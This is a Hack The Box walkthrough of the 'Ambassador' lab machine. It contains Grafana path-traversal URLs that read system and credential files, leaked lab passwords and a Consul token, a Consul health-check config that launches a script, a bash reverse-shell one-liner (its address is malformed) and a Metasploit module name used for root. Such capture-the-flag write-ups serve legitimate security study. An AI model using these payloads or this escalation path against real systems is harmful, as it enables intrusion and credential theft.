Jan 28
Ambassador — Hackthebox walkthorugh
User
Doing the initial nmap scan, we see 4 ports open
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 29:dd:8e:d7:17:1e:8e:30:90:87:3c:c6:51:00:7c:75 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDLYy5+VCwR+2NKWpIRhSVGI1nJQ5YeihevJqIYbfopEW03vZ9SgacRzs4coGfDbcYa+KPePbz2n+2zXytEPfzBzFysLXgTaUlDFcDqEsWP9pJ5UYFNfXqHCOyDRkl
setFOBcxkgC8/IcHDJdJQTEr51KLF75ZXaEIcjZ+XuQWsOrU5DJPrAlCmG12OMjsnP4OfI4RpIjELuLCyVSItoin255/99SSM3koBheX0im9/V8IOpEye9Fc2LigyGA+97wwNSZG2G/duS6lE8pYz1unL+Vg2ogGDN85T
kkrS3XdfDLI87AyFBGYniG8+SMtLQOd6tCZeymGK2BQe1k9oWoB7/J6NJ0dylAPAVZ1sDAU7KCUPNAex8q6bh0KrO/5zVbpwMB+qEq6SY6crjtfpYnd7+2DLwiYgcSiQxZMnY3ZkJiIf6s5FkJYmcf/oX1xm/TlP9qoxR
80/tcp open http syn-ack Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Ambassador Development Server
|_http-generator: Hugo 0.94.2
| http-methods:
|_ Supported Methods: GET POST OPTIONS HEAD
|_http-server-header: Apache/2.4.41 (Ubuntu)
3000/tcp open ppp? syn-ack
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.0 302 Found
| Cache-Control: no-cache
| Content-Type: text/html; charset=utf-8
| Expires: -1
| Location: /login
| Pragma: no-cache
| Set-Cookie: redirect_to=%2Fnice%2520ports%252C%2FTri%256Eity.txt%252ebak; Path=/; HttpOnly; SameSite=Lax
| X-Content-Type-Options: nosniff
| X-Frame-Options: deny
| X-Xss-Protection: 1; mode=block
| Date: Mon, 03 Oct 2022 04:37:31 GMT
| Content-Length: 29
| href="/login">Found</a>.
| GenericLines, Help, Kerberos, RTSPRequest, SSLSessionReq, TLSSessionReq, TerminalServerCookie:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
| Request
3306/tcp open mysql syn-ack MySQL 8.0.30-0ubuntu0.20.04.2
| mysql-info:
| Protocol: 10
| Version: 8.0.30-0ubuntu0.20.04.2
| Thread ID: 12
| Capabilities flags: 65535
| Some Capabilities: Support41Auth, Speaks41ProtocolOld, SupportsTransactions, IgnoreSigpipes, SupportsCompression, SwitchToSSLAfterHandshake, FoundRows, ODBCClien
t, ConnectWithDatabase, Speaks41ProtocolNew, LongColumnFlag, DontAllowDatabaseTableColumn, LongPassword, SupportsLoadDataLocal, InteractiveClient, IgnoreSpaceBeforeP
arenthesis, SupportsMultipleStatments, SupportsMultipleResults, SupportsAuthPlugins
| Status: Autocommit
| Salt: \x1D?!9'Z3\x01cc5\x1E:`9mj\x0D99
|_ Auth Plugin Name: caching_sha2_passwordLooking at port 3000, we see it’s runnning Grafana At the bottom we can see it’s version at v8.2.0
Looking for exploits for this version, we see an Local File Inclusion vulnerability exists for versions from 8.1.0 to 8.3.0
I also found a python script to exploit this
But unfortunately this didn’t work for me, so I had to look in to the source code and figure out how to exploit this manually.
Seems like it’s getting an vulnerable endpoint and sending a typical LFI payload. Following the exploit, I was able to get the contents of the /etc/passwd file with this payload.
http://10.10.11.183:3000/public/plugins/alertlist/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd
Here, I found out that there is a user called developer
Since I there is Grafana running, with this LFI, I looked into it’s configuration file at /etc/grafana/grafana.ini
http://10.10.11.183:3000/public/plugins/alertlist/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/grafana/grafana.iniFrom there, I found that there was a sqlite3 database to look for. It was at /var/lib/grafana/grafana.db
So I downloaded it and opened it with sqlitbrowser
http://10.10.11.183:3000/public/plugins/alertlist/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fvar/lib/grafana/grafana.dbFrom there I found the password to login to the mysql server as grafana user.
mysql -u grafana -p -h 10.10.11.183 -p'dontStandSoCloseToMe63221!'Looking through the databases, I saw there was a database called whackywidget quering this database, I was able to a base64 encoded password for the developer use
By decoding this, I was able to login with ssh as developer
developer:anEnglishManInNewYork027468Root
Looking through the file system, I saw there was a git repo in /opt/my-app Looking for previous commits in the repo with git show , I was able to get a token for consul
Looking at the open ports, I saw port 8500 was open, which is the default port for consul service
Also consul was running as root
From this point onwards, there are 2 ways to go.
Method I — Manual exploitation with health check scripts
So I started enumerating the service more. Then I was able to figure out that the config directory for consul was writable by the developer user.
I did a little googling and found out that I can add health check scripts for consul which will be triggered upon restart. So I made a health check script which would execute a bash script that includes a reverse shell.
{
"check": {
"id": "shell",
"name": "Shell",
"args": ["/tmp/shell.sh"],
"interval": "10s",
"timeout": "600s"
}
}I moved this file to the config directory of consul
cp /tmp/check.json /etc/consul.d/config.d/And for the reverse shell(/tmp/shell.sh), I used the typical bash reverse shell.
bash -c 'bash -i >& /dev/tcp/10.10.11.12.9090/ 0>&1'Once everything was in place, I restarted the consul service
consul reload --token bb03b43b-1d81-d62b-24b5-39540ee469b5
Then I got a shell on my listener.
Method II — Exploiting with Metasploit by registering a service
After while I was doing the box, I came across an exploit module from metasploit which could exploit the consul service by registering a new service.
For that you have to use the exploit/multi/misc/consul_service_exec module. You have to set the options as follows and simply run the module.
Once you run it, you should be able to get a full meterpreter session which then can be used to get a shell as root.
Rooted!
Contact me though social media:
Email — iamkavigihan@gmail.com
Instagram — https://www.instagram.com/_kavi.gihan/
Discord — kavigihan#8518
Happy Hacking !!! 😄
